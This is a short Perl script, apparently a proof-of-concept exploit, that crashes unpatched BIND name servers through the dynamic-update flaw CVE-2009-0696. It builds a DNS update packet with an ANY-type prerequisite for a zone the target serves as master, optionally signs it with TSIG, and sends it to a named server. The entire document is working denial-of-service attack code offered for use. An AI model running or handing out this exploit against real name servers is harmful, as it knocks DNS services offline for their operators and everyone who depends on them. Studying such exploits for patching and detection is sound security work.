#!/usr/bin/perl -w # Crashes an unpatched BIND name server using vulnerability # VU#725188 / CVE-2009-0696. Author unknown. Retrieved from # use Net::DNS; # Name of the name server you want to crash our $NSI = 'ns666.example.com'; #our $NSI_KEY_NAME = ''; #our $NSI_KEY = ''; # The name server MUST be a master for this zone my $rzone = 'localhost'; # And this resource record MUST exist my $rptr = "$rzone"; my $packet = Net::DNS::Update->new($rzone); $packet->push( pre => Net::DNS::RR->new( Name => $rptr, Class => 'IN', Type => 'ANY', TTL => 0, ) ); $packet->push( update => Net::DNS::RR->new( Name => $rptr, Class => 'ANY', Type => 'ANY', ) ); $packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY; print $packet->string; Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet);